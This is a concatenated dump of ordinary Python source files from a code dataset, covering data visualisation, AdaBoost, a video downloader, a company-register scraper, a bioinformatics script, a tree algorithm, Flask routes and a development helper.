result_dic (dict): {user_id: country_destination}, the destination of each user\n\n \"\"\"\n tmpdf = pd.DataFrame(df.groupby(['user_id', 'action_type'])['secs_elapsed'].agg(np.sum))\n tmpdf['id'] = tmpdf.index.map(lambda x: x[0])\n tmpdf['action'] = tmpdf.index.map(lambda x: x[1])\n tmpdf['device_type'] = tmpdf.id.apply(lambda x: device_dic[x] if x in device_dic.keys() else '0')\n tmpdf['country_destination'] = tmpdf.id.apply(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n\n str1 = 'Unsuccessful booking'\n str2 = 'Successful booking'\n\n fontsize = 'large'\n ax = pd.DataFrame(\n {str2: tmpdf[tmpdf['country_destination'] != 'NDF'].groupby('action_type')['secs_elapsed'].agg(np.mean),\n str1: tmpdf[tmpdf['country_destination'] == 'NDF'].groupby('action_type')['secs_elapsed'].agg(np.mean)\n }).plot.barh(figsize=(12,5))\n\n plt.title('Average Time spent on an Action', fontsize=fontsize)\n plt.ylabel('Action type', fontsize=fontsize)\n plt.xlabel('Time/ms', fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xticks(fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_language_time(df, device_dic, result_dic, lang_dic):\n \"\"\"\"\n make a plots for part 2.2 and part 2.3.\n\n 2.2. average time that a single user spends during booking with respect to languages\n\n 2.3. devices have higher success rates when booking a destination\n\n Args:\n df (dataframe): the input dataframe that we are going to plot about\n\n device_dic (dict): {user_id: device_type}, the device type of each user\n\n result_dic (dict): {user_id: country_destination}, the destination of each user\n\n lang_dic (dict): {user_id: language}, the language of each user\n\n\n \"\"\"\n\n id_grouped = df.groupby('user_id')\n\n id_df = pd.DataFrame(id_grouped['secs_elapsed'].agg([np.sum, np.mean, np.std]))\n id_df['country_destination'] = id_df.index.map(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n id_df['language'] = id_df.index.map(lambda x: lang_dic[x] if x in lang_dic.keys() else '0')\n id_df['device'] = id_df.index.map(lambda x: device_dic[x] if x in device_dic.keys() else '0')\n full_lang = {'en': 'English', 'zh': 'Chinese', 'ko': 'Korean', 'fr': 'French', 'es': 'Spanish',\n 'de': 'German', 'ru': 'Russian', 'it': 'Italian', 'ja': 'Japanese', 'pt': 'Portuguese'}\n id_df['full_language'] = id_df.language.apply(lambda x: full_lang[x] if x in full_lang.keys() else '0')\n\n id_df[id_df['full_language'] != '0'].boxplot(column='sum', by='full_language', showfliers=False, patch_artist=True)\n plt.title('Average time that a single user spend during booking')\n plt.ylabel('Time/ms')\n plt.xlabel('Language')\n plt.xticks(rotation=\"45\")\n st.pyplot()\n\n\n # ===========part 2.3 ============\n st.subheader(\"Part 2.3 Do devices play a role in this comparisons?\")\n\n device_df = pd.DataFrame({'NDF': id_df[id_df['country_destination'] == 'NDF'].groupby('device')['sum'].agg(np.size),\n 'DF': id_df[id_df['country_destination'] != 'NDF'].groupby('device')['sum'].agg(np.size)\n })\n\n str1 = 'Unsuccessful booking'\n str2 = 'Successful booking'\n\n device_usernum = dict(id_df.groupby('device')['country_destination'].agg(np.size))\n device_df['total_number'] = device_df.index.map(lambda x: device_usernum[x] if x in device_usernum.keys() else '0')\n\n device_df[str1] = device_df.eval('NDF / total_number * 100')\n device_df[str2] = device_df.eval('DF / total_number * 100')\n device_df = device_df.sort_values(by=\"total_number\", ascending=True)\n\n device_df[[str2, str1]].plot.barh(stacked=True,legend=False,figsize=(12,7))\n plt.ylabel('Device type(sorted)')\n plt.xlabel('Percentage',fontsize=\"xx-large\")\n plt.title('Success Booking Rate of each Device')\n plt.legend(loc='lower left',bbox_to_anchor=(-0.1,-0.1))\n st.pyplot()\n\n\ndef visualization(df):\n # === Start Streamlit Application ===#\n st.title(\"Airbnb Data Analytics\")\n st.image(Image.open('airbnb-recruiting-new-user-bookings/figs'\n '/data_analytics_front_page.jpg'), use_column_width=True)\n st.markdown(\n \"\"\"\n Interested in what are popular destination spots?\\n\\nWhat about who is \n visiting them?\\n\\nAre there any patterns within the data?\\n\\nIf you \n answered yes to any of these questions, please take a look at our data \n analysis of Airbnb's country booking dataset to find out the answers and \n other relevant information.\n \"\"\")\n\n user_date = load_data()\n device_dic, result_dic, lang_dic = load_data_part2()\n\n # ===========part 1===========\n st.header(\"Part 1: Airbnb Travelers 101\")\n st.markdown(\"This section focuses on investigating the lay of the land with \"\n \"Airbnb's country booking dataset i.e. exploring what countries are \"\n \"being visited, when is this happening, etc.\")\n\n # ===========part 1.1 countries visited most===========\n st.subheader(\"Part 1.1 What countries are being visited the most?\")\n\n plot_country_most_visited(user_date)\n\n # ===========part 1.2 when travelling takes place===========\n st.subheader(\"Part 1.2 When is the travelling taking place?\")\n options = st.multiselect('Select countries to view their travelling rate',\n ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT'], ['US', 'CA'])\n\n c_x = clean_data(user_date, options)\n\n plot_country_time_series(c_x, options)\n\n # ===========part 1.3 who are the travellerss=========== #\n st.subheader(\"Part 1.3 Who are the travellers?\")\n options1 = st.multiselect('Select countries to see their age distribution',\n ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT'], ['US', 'CA'])\n\n plot_age(user_date, options1)\n\n # plot_age_sub(user_date, options1)\n\n st.header(\"Part 2: Successful Booking vs No Booking\")\n st.markdown(\"In ideal world for Airbnb, users, who visit their website, would end \"\n \"up making a booking. However, this isn't the case. We seek to \"\n \"investigate what are similarities and differences between users who \"\n \"make a successful booking vs users who do not book.\")\n\n\n #df, device_dic, result_dic, lang_dic = load_data_part2()\n\n # ===========part 2.1===========\n st.subheader(\"Part 2.1 Is there a pattern in the elapsed time of an action?\")\n plot_avg_time_action_type(df, device_dic, result_dic)\n\n # ===========part 2.2 and 2.3 =========== #\n st.subheader(\"Part 2.2 Delving deeper into the elapsed time\")\n\n plot_language_time(df, device_dic, result_dic, lang_dic)\n\n\nif __name__ == \"__main__\":\n visualization()\n","sub_path":"src/visualization_app.py","file_name":"visualization_app.py","file_ext":"py","file_size_in_byte":16196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"207975048","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nclass AdaBoost:\n \n def __init__(self, X, Y):\n self.X = X\n self.Y = Y\n self.n = X.shape[0]\n self.p = X.shape[1]\n self.w = np.repeat(1, X.shape[0]) / X.shape[0]\n self.G = []\n self.a = []\n \n def run(self, times):\n for m in range(times):\n # a\n clf = DecisionTreeClassifier(max_depth = 1, random_state = 1)\n clf.fit(self.X, self.Y, sample_weight = self.w)\n self.G.append(clf)\n # b\n yhats = clf.predict(self.X)\n err = 0\n for i in range(n):\n if self.Y[i] != yhats[i]:\n err += self.w[i]\n err = err / sum(self.w) \n # c\n a = np.log((1 - err) / err)\n self.a.append(a)\n # d \n for i in range(len(self.w)):\n factor = 0\n if self.Y[i] != yhats[i]:\n factor = a\n self.w[i] = self.w[i] * np.exp(factor)\n \n def predict(self):\n yhats = []\n for i in range(n):\n output = 0\n for j in range(len(self.a)):\n output += self.a[j] * self.G[j].predict(X[i:i+1, :])\n if output > 0:\n yhats.append(1)\n else:\n yhats.append(-1)\n self.yhats = yhats \n\n\nn, p = 50, 50\n\nX = np.random.rand(n, n)\nY = np.random.choice([1, -1], n)\n\nmjr = AdaBoost(X, Y)\nmjr.run(5)\nmjr.predict()\nprint(np.sum(mjr.yhats == Y) / len(Y))\nclf = DecisionTreeClassifier(max_depth = 1, random_state = 1)\nclf.fit(X, Y)\nyhats = clf.predict(X)\nprint(np.sum(yhats == Y) / len(Y))\n ","sub_path":"python/anaconda/spyder/machine-learning/AdaBoost-Class.py","file_name":"AdaBoost-Class.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450102076","text":"# -*- coding: UTF-8 -*-\nfrom urllib import request\nfrom urllib import error\nfrom urllib import parse\nfrom http import cookiejar\nimport os\nimport time\n\nimport myGlobal\n\n#User-Agent信息 \nuser_agent = r'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36'\n#Headers信息\nhead = {'User-Agnet': user_agent, 'Connection': 'keep-alive'}\n\ndef downloadVideo(startLine):\n file = open(\"videoUrl.txt\")\n\n downloadUrl = ''\n vid = 0\n\n while 1:\n vid = vid + 1\n if vid < startLine:\n continue\n if vid > 1000:\n break\n downloadUrl = file.readline()\n\n if not downloadUrl:\n break\n try:\n # time.sleep(1)\n path = getPath(vid)\n fileName = path + str(vid) + \".mp4\"\n if os.path.exists(path) == False:\n os.makedirs(path)\n if os.path.exists(fileName) == True:\n continue\n\n req = request.Request(url=downloadUrl, headers=head)\n response = request.urlopen(req)\n \n file2 =response.read()\n with open(fileName,'wb') as f:\n print(\"save -> %s \" % fileName)\n print(downloadUrl)\n f.write(file2)\n except error.URLError as e:\n if hasattr(e, 'code'):\n print(\"HTTPError:%d\" % e.code)\n elif hasattr(e, 'reason'):\n print(\"URLError:%s\" % e.reason)\n print(downloadUrl)\n\ndef getPath(id):\n basePath = myGlobal.path\n hundred = id // 100\n value = id % 100\n return basePath + str(hundred) + \"/\"\n\n\nif __name__ == '__main__':\n startLine = myGlobal.startLine\n downloadVideo(startLine)\n","sub_path":"Python3/spider/playerSpider/downloadVideo.py","file_name":"downloadVideo.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66173861","text":"from typing import Dict\n\nimport dateparser\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom deutschland.config import Config, module_config\n\n\nclass Publications:\n def __init__(self, config: Config = None):\n if config is None:\n self._config = module_config\n else:\n self._config = config\n\n REQUEST_HEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"de\",\n \"Cache-Control\": \"max-age=0\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"dnt\": \"1\",\n \"Host\": \"www.handelsregisterbekanntmachungen.de\",\n \"Origin\": \"https://www.handelsregisterbekanntmachungen.de\",\n \"Referer\": \"https://www.handelsregisterbekanntmachungen.de/?aktion=suche\",\n \"sec-ch-ua\": '\"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"',\n \"sec-ch-ua-mobile\": \"?0\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-User\": \"?1\",\n \"sec-gpc\": \"1\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\",\n }\n\n SEARCH_URL = \"https://www.handelsregisterbekanntmachungen.de/?aktion=suche\"\n\n DEFAULT_FORM_DATA = {\n \"suchart\": \"uneingeschr\",\n \"land\": None,\n \"gericht\": None,\n \"gericht_name\": None,\n \"vt\": None,\n \"vm\": None,\n \"vj\": None,\n \"bt\": None,\n \"bm\": None,\n \"bj\": None,\n \"fname\": None,\n \"fsitz\": None,\n \"rubrik\": None,\n \"az\": None,\n \"gegenstand\": 0,\n \"order\": 4,\n \"button\": \"Suche starten\",\n }\n\n def search_with_raw_params(\n self, params: Dict[str, str] = {}, proxies: Dict[str, str] = None\n ):\n \"\"\"\n Searches the Publications of the Handelsregister with a given dict of parameters.\n\n Parameters\n ----------\n params : dict\n The parameters for the search. Detailed description below.\n\n Search Parameters\n -----------------\n suchart : string\n Specifies whether the search should be general or detailed.\n Either 'uneingeschr' or 'detail'.\n\n General searches (e.g. find all publications in all counties and all courts)\n can only include publications from the last 4 weeks.\n\n Detailed searches can include past publications as well, but require\n the following parameters:\n 'county_code', 'court_code', and 'court_name' as well as\n either 'company_name', 'head_office_location'\n or 'registration_type' and 'registration_number'\n\n land : str\n The code of the county in which to search for publications.\n\n Valid options are:\n by: Bayern\n be: Berlin\n br: Brandenburg\n hb: Bremen\n hh: Hamburg\n he: Hessen\n mv: Mecklenburg-Vorpommern\n ni: Niedersachsen\n nw: Nordrhein-Westfalen\n rp: Rheinland-Pfalz\n sl: Saarland\n sn: Sachsen\n st: Sachsen-Anhalt\n sh: Schleswig-Holstein\n th: Thüringen\n\n gericht : str\n The code of the court in which to search for publications.\n Court Code + Court Name combinations can be found in 'params.md'.\n The parameters 'gericht' and 'gericht_name' must both be present.\n\n gericht_name : str\n The name of the court in which to search for publications.\n Court Code + Court Name combinations can be found in 'params.md'.\n This parameter must be provided together with the 'gericht'-parameter.\n\n vt: int\n The day of the date after which publications must have been published.\n\n vm: int\n The month of the date after which publications must have been published.\n\n vj: int\n The year of the date after which publications must have been published.\n\n bt: int\n The day of the date before which publications must have been published.\n\n bm: int\n The month of the date before which publications must have been published.\n\n bj: int\n The year of the date before which publications must have been published.\n\n fname: str\n The name of the company. Must be an exact match.\n\n fsitz: str\n The city where the head office of the company is located.\n\n rubrik: str\n The type of the company registration.\n Valid types are:\n \"A\", \"B\", \"G\", \"V\", \"P\", \"AR\"\n\n az: str\n The number of the company registration.\n\n gegenstand: int\n The type of publication to search for.\n\n Valid options are:\n 0 : All types of publications\n 1 : New registrations\n 2 : Registration changes\n 3 : Registrations deleted by the court\n 4 : Deletion announcements\n 5 : Deletions\n 6 : Granted Permissions\n 7 : Other procedures\n\n order: int\n How to order the publication results.\n\n Valid options are:\n 1 : Registration Number\n 2 : Company name\n 3 : Order by creation date of publication\n 4 : Order by publication date\n \"\"\"\n\n # parameter has higher priority than member\n if proxies is None:\n if self._config is not None and self._config.proxy_config is not None:\n proxies = self._config.proxy_config\n\n search_params = {**self.DEFAULT_FORM_DATA, **params}\n\n response = requests.post(\n self.SEARCH_URL,\n data=search_params,\n headers=self.REQUEST_HEADERS,\n proxies=proxies,\n )\n if response.status_code != 200:\n return None\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n return self.__find_entries(soup)\n\n def __find_entries(self, soup):\n content = soup.find(\"div\", id=\"inhalt\")\n lis = content.find_all(\"li\")\n\n results = []\n\n for li in lis:\n a = li.find(\"a\")\n [pub_id, county_code] = self.__extract_pub_id_and_county_code(a)\n\n ul = a.find(\"ul\")\n [info, _, published_info] = ul.contents\n\n company_info = self.__extract_company_info(info)\n published_at = self.__extract_published_at(published_info)\n\n data = {\n **{\n \"publication_id\": pub_id,\n \"county_code\": county_code,\n \"published_at\": published_at,\n },\n **company_info,\n }\n\n results.append(data)\n\n return results\n\n def __extract_pub_id_and_county_code(self, link):\n [pub_id, county] = (\n link[\"href\"]\n .replace(\"javascript:NeuFenster('rb_id=\", \"\")\n .replace(\"')\", \"\")\n .split(\"&\")\n )\n county_code = county.replace(\"land_abk=\", \"\")\n\n return [pub_id, county_code]\n\n def __extract_company_info(self, text):\n branch_name = None\n\n fields = text.split(\",\")\n if len(fields) == 3:\n [company_name, court, reg_info] = fields\n elif len(fields) == 4:\n [company_name, branch_name, court, reg_info] = fields\n else:\n raise Exception(f\"Could not parse publication info: '{text}'.\")\n\n [reg_type, reg_num] = reg_info.strip().split(\" \")\n\n return {\n \"company_name\": company_name.strip(),\n \"court\": court.strip(),\n \"branch_name\": branch_name.strip() if branch_name else None,\n \"registration_type\": reg_type.strip(),\n \"registration_number\": reg_num.strip(),\n }\n\n def __extract_published_at(self, info):\n published_at_raw = info.replace(\"Bekannt gemacht am: \", \"\")\n return dateparser.parse(published_at_raw, date_formats=[\"%d.%m.%Y\"])\n","sub_path":"src/deutschland/handelsregister/publications.py","file_name":"publications.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"53889001","text":"#! /usr/bin/env python3\n\n\"\"\"Collect all read length distribution .csv.gz files for all replicates\ninto a large table (unique counts only). If the files are not already available,\nthen they are created.\n\nNote* The isoform strategy option will be removed.\n\n Does not consider the filtered Ribo-seq BAM files with\n periodic fragment lengths (i.e. uses all fragments,\n they can easily be filtered afterwards); however, for RNA-seq, if\n mapping was done on trimmed reads, additional arguments must be\n given to find the right files.\n\nFunctions:\n add_data\n\"\"\"\n\nimport os\nimport argparse\nimport logging\nimport yaml\nimport csv\nimport re\n\nimport pandas as pd\n\nimport pbio.misc.logging_utils as logging_utils\nimport pbio.misc.parallel as parallel\nimport pbio.misc.pandas_utils as pandas_utils\nimport pbio.misc.utils as utils\nimport pbio.misc.shell_utils as shell_utils\n\nimport pbio.ribo.ribo_utils as ribo_utils\nimport pbio.ribo.ribo_filenames as filenames\n\nimport btea.utils.cl_utils as clu\n\nfrom rpbp.defaults import metagene_options\n\nlogger = logging.getLogger(__name__)\n\ndata_get_length_distribution = {\n 'rna': filenames.get_rnaseq_read_length_distribution,\n 'ribo': filenames.get_riboseq_read_length_distribution,\n}\n\ndata_get_bam = {\n 'rna': filenames.get_rnaseq_bam,\n 'ribo': filenames.get_riboseq_bam,\n}\n\n\ndef add_data(sample_name, get_length_distribution, data, note, args):\n\n read_length_distribution_file = get_length_distribution(data,\n sample_name,\n note=note,\n isoform_strategy=args.isoform_strategy)\n\n read_length_distribution = pd.read_csv(read_length_distribution_file)\n\n ret = pd.pivot_table(read_length_distribution,\n values='count',\n columns='length',\n index='basename')\n\n return ret\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('config', help=\"The yaml configuration file.\")\n\n parser.add_argument('seq', choices=['rna', 'ribo'])\n\n parser.add_argument('out', help='''The output file complete path without extension. \n If relevant, two files are created, one for all reads, and another for unique mappers.''')\n\n parser.add_argument('--overwrite', help='''Overwrites output file. This will NOT \n overwrite the read length distribution files.''', action='store_true')\n\n parser.add_argument('--ribo-config', help=\"\"\"Optional argument: the Ribo config file\n when seq is rna and rna reads have been trimmed to max ribo fragment lengths.\n If reads are trimmed then this needs to be given, otherwise the program will not find \n the alignment files. In addition, the rna config file must include 'matching_samples'.\"\"\",\n type=str)\n\n clu.add_isoform_strategy(parser)\n logging_utils.add_logging_options(parser)\n args = parser.parse_args()\n logging_utils.update_logging(args)\n logging_str = logging_utils.get_logging_options_string(args)\n\n config = yaml.load(open(args.config), Loader=yaml.FullLoader)\n note = config.get('note', None)\n\n if args.ribo_config:\n ribo_config = yaml.load(open(args.ribo_config), Loader=yaml.FullLoader)\n is_unique_ribo = not ('keep_riboseq_multimappers' in ribo_config)\n\n keep_key = 'keep_' + str(args.seq) + 'seq_multimappers'\n is_unique = not (keep_key in config)\n\n data_key = str(args.seq) + 'seq_data'\n rep_key = str(args.seq) + 'seq_samples'\n replicates = config[rep_key].keys()\n\n get_length_distribution = data_get_length_distribution[args.seq]\n get_bam = data_get_bam[args.seq]\n\n sample_name_map = ribo_utils.get_sample_name_map(config)\n\n # first check if the files exist, if not generate the read length distributions\n for replicate in replicates:\n\n read_length_distribution = get_length_distribution(config[data_key],\n replicate,\n note=note,\n isoform_strategy=args.isoform_strategy)\n\n ret = utils.check_files_exist([read_length_distribution], raise_on_error=False)\n if ret:\n continue\n\n msg = 'Creating {}'.format(read_length_distribution)\n logger.info(msg)\n\n if args.seq == 'rna' and args.ribo_config:\n config_keys = ['matching_samples']\n utils.check_keys_exist(config, config_keys)\n matching_ribo_sample = config['matching_samples'][replicate]\n\n # get the lengths, we don't need the offsets\n lengths, _ = ribo_utils.get_periodic_lengths_and_offsets(ribo_config,\n matching_ribo_sample,\n is_unique=is_unique_ribo,\n default_params=metagene_options,\n isoform_strategy=args.isoform_strategy)\n\n if len(lengths) == 0:\n msg = \"No periodic read lengths and offsets were found!\"\n logger.error(msg)\n\n lengths = str(max([int(l) for l in lengths]))\n\n else:\n lengths = None\n\n # all aligned reads\n genome_bam = get_bam(config[data_key],\n replicate,\n is_unique=False,\n length=lengths,\n isoform_strategy=args.isoform_strategy,\n note=note)\n\n if is_unique:\n # uniquely aligned reads\n unique_bam = get_bam(config[data_key],\n replicate,\n is_unique=is_unique,\n length=lengths,\n isoform_strategy=args.isoform_strategy,\n note=note)\n\n in_files = [genome_bam, unique_bam]\n cmd = \"get-read-length-distribution {} {} --out {} {}\".format(\n genome_bam,\n unique_bam,\n read_length_distribution,\n logging_str\n )\n else:\n in_files = [genome_bam]\n cmd = \"get-read-length-distribution {} --out {} {}\".format(\n genome_bam,\n read_length_distribution,\n logging_str\n )\n\n out_files = [read_length_distribution]\n shell_utils.call_if_not_exists(cmd,\n out_files,\n in_files=in_files,\n call=True)\n\n msg = 'Parsing read length distribution files'\n logger.info(msg)\n\n all_length_distributions = parallel.apply_iter_simple(\n replicates,\n add_data,\n get_length_distribution,\n config[data_key],\n note,\n args\n )\n\n all_length_distributions_df = pd.concat(all_length_distributions).fillna(0)\n all_length_distributions_df['name'] = all_length_distributions_df.index\n\n # adjust the names\n if args.isoform_strategy is not None:\n repl = '.{}'.format(args.isoform_strategy)\n all_length_distributions_df['name'] = all_length_distributions_df['name'].str.replace(repl, '')\n if args.seq == 'rna' and args.ribo_config:\n repl = re.compile('.length-\\d{2}')\n all_length_distributions_df['name'] = all_length_distributions_df['name'].str.replace(repl, '')\n if note is not None:\n repl = '.{}'.format(note)\n all_length_distributions_df['name'] = all_length_distributions_df['name'].str.replace(repl, '')\n\n # split into all and unique\n m_unique = False\n out_files = [args.out + '.csv.gz']\n out_df = []\n if is_unique:\n m_unique = all_length_distributions_df['name'].str.contains('unique')\n unique_read_length_distribution_df = all_length_distributions_df[m_unique].copy()\n unique_read_length_distribution_df['name'] = unique_read_length_distribution_df['name'].str.replace('-unique',\n '')\n unique_read_length_distribution_df['name'] = unique_read_length_distribution_df['name'].apply(\n lambda x: sample_name_map[x])\n unique_read_length_distribution_df.set_index('name', inplace=True)\n unique_read_length_distribution_df.index.name = 'condition'\n out_files.append(args.out + '-unique.csv.gz')\n out_df.append(unique_read_length_distribution_df)\n\n all_length_distributions_df = all_length_distributions_df[~m_unique]\n all_length_distributions_df['name'] = all_length_distributions_df['name'].apply(lambda x: sample_name_map[x])\n all_length_distributions_df.set_index('name', inplace=True)\n all_length_distributions_df.index.name = 'condition'\n out_df.append(all_length_distributions_df)\n out_df.reverse()\n\n msg = \"Writing output to: {}\".format(','.join(out_files))\n logger.info(msg)\n\n for file, df in zip(out_files, out_df):\n if os.path.exists(file) and not args.overwrite:\n msg = \"Output file {} already exists. Skipping.\".format(file)\n logger.warning(msg)\n else:\n pandas_utils.write_df(df, file, create_path=True,\n index=True, sep=',', header=True,\n do_not_compress=False, quoting=csv.QUOTE_NONE)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pproc/pgrms/get_all_read_length_distributions.py","file_name":"get_all_read_length_distributions.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"124807441","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport math #add modul math\r\nimport numpy #add modul numpy\r\nimport matplotlib.pyplot as mpp #add modul matplotlib and rename it to mpp\r\n\r\n\r\nif __name__=='__main__': #условие\r\n arguments = numpy.r_[0:200:0.1]#arguments - множество чисел от 0 до 200 с шагом0.1\r\n mpp.plot( #обращение к модулю\r\n arguments, #???\r\n [math.sin(a) * math.sin(a/20.0) for a in arguments] #для а из arguments\r\n ) #скобочка)\r\n mpp.show() #вывод графика\r\n","sub_path":"my1stpr.py","file_name":"my1stpr.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"400483873","text":"from app.controllers.product_controller import (\n create_product,\n delete_product_by_id,\n get_product_by_id,\n get_products,\n get_image_product,\n update_product_by_id,\n upload_product_image_by_product_id\n)\nfrom flask import Blueprint\n\nbp = Blueprint('products_bp', __name__, url_prefix='/products')\n\nbp.post('')(create_product)\nbp.post('/')(upload_product_image_by_product_id)\nbp.get('')(get_products)\nbp.get('/')(get_product_by_id)\nbp.get('//')(get_image_product)\nbp.patch('/')(update_product_by_id)\nbp.delete('/')(delete_product_by_id)\n","sub_path":"app/routes/products_routes.py","file_name":"products_routes.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"645299520","text":"\n\nclass Node:\n def __init__(self, data):\n self.key = data\n self.left = self.right= None\n\n\ndef areIdentical(root1, root2):\n if root1 is None and root2 is None:\n return True\n if root1 is None or root2 is None:\n return False\n\n return (root1.key==root2.key and areIdentical(root1.left, root2.left) and areIdentical(root1.right,root2.right))\n\n\ndef isSubtree(T, S):\n if S is None:\n return True\n\n if T is None:\n return False\n\n if areIdentical(T, S):\n return True\n\n return isSubtree(T.left, S) or isSubtree(T.right, S)\n\n\nif __name__ == \"__main__\":\n T = Node(26)\n T.right = Node(3)\n T.right.right = Node(3)\n T.left = Node(10)\n T.left.left = Node(4)\n T.left.left.right = Node(30)\n T.left.right = Node(6)\n\n S = Node(10)\n S.right = Node(6)\n S.left = Node(4)\n S.left.right = Node(30)\n S.left.right.left = Node(80)\n\n\n if isSubtree(T, S):\n print(\"Tree 2 is subtree of Tree 1\")\n else :\n print(\"Tree 2 is not a subtree of Tree 1\")","sub_path":"Tree/9.check_BST_is_subtree_of_anotherBST.py","file_name":"9.check_BST_is_subtree_of_anotherBST.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"135647309","text":"import imp\nimport os\nimport shlex\nimport subprocess\nimport sys\nimport unittest\nfrom io import StringIO\n\nimport coverage\nfrom isort import SortImports\nfrom pep8 import StyleGuide\nfrom pyflakes.api import checkPath\nfrom pyflakes.reporter import Reporter\n\nimport subcomm\n\nHERE = os.path.dirname(os.path.abspath(__file__))\n\nparser = subcomm.SubcommParser(description='Helper for Subcomm development.')\n\n\n#########\n# HELPERS\n#########\n\nclass CommandFailed(Exception):\n pass\n\n\ndef run(command, *args, **kwargs):\n if subprocess.run(shlex.split(command), *args, **kwargs).returncode != 0:\n raise CommandFailed(command)\n\n\ndef output(command, *args, **kwargs):\n return subprocess.check_output(shlex.split(command), *args, **kwargs)\\\n .decode('utf-8')\n\n\nSTYLEGUIDE = StyleGuide()\n\n\ndef check_pep8(path):\n pep8_stdout = StringIO()\n default_stdout = sys.stdout\n sys.stdout = pep8_stdout\n pep8_errors = STYLEGUIDE.input_file(path)\n sys.stdout = default_stdout\n\n if pep8_errors:\n return pep8_stdout.getvalue().strip().split('\\n')\n return []\n\n\ndef check_pyflakes(path):\n stdout = StringIO()\n reporter = Reporter(stdout, stdout)\n errors = checkPath(path, reporter)\n\n if errors > 0:\n return stdout.getvalue().strip().split('\\n')\n return []\n\n\ndef check(path):\n errors = []\n errors.extend(check_pep8(path))\n errors.extend(check_pyflakes(path))\n return errors\n\n\ndef pristine_repository():\n return not bool([\n line\n for line in output('git clean -dfx --dry-run').strip().split('\\n')\n if line and '__pycache__' not in line\n ])\n\n\ndef sort_requirements():\n with open(os.path.join(HERE, 'min-requirements.txt'), 'r') as fp:\n requirements = fp.read()\n requirements = '\\n'.join(sorted(requirements.strip().split('\\n'),\n key=str.lower)) + '\\n'\n with open(os.path.join(HERE, 'min-requirements.txt'), 'w') as fp:\n fp.write(requirements)\n\n\ndef sort_code(path):\n SortImports(path, multi_line_output=2, not_skip=['__init__.py'])\n\n\n##########\n# HANDLERS\n##########\n\n@parser.command(help='Check code quality.')\ndef quality():\n sort_requirements()\n\n errors = []\n for root, dirs, files in os.walk(HERE):\n for file in files:\n if file.endswith('.py'):\n path = os.path.join(root, file)\n sort_code(path)\n errors.extend(check(path))\n\n if errors:\n print('\\n'.join(errors))\n return 1\n\n print('Code looks good. Congratulations :)')\n return 0\n\n\n@parser.command(help='Run automated test suite.')\ndef test():\n cov = coverage.Coverage(branch=True, source=['subcomm'])\n cov.start()\n\n imp.reload(subcomm)\n\n test_loader = unittest.defaultTestLoader\n test_suite = test_loader.discover(start_dir=os.path.join(HERE))\n runner = unittest.TextTestRunner(verbosity=2)\n success = runner.run(test_suite).wasSuccessful()\n\n cov.stop()\n\n if not success:\n return 1\n\n cover_percent = cov.html_report(directory='html_cov')\n print('Test coverage: {percent:.2f}%'.format(percent=cover_percent))\n return 0 if cover_percent == 100 else 1\n\n\n@parser.command(help='Packages Subcomm for distribution in PyPI.')\ndef package():\n if not pristine_repository():\n print('Repository is not pristine.')\n return 1\n\n if quality() != 0:\n print(\"Repository's code is not passing quality test.\")\n return 1\n\n run('python setup.py sdist')\n run('python setup.py bdist_wheel')\n return 0\n\n\n########################\n# DEVELOPMENT ENTRYPOINT\n########################\n\nif __name__ == '__main__':\n sys.exit(parser.run())\n","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
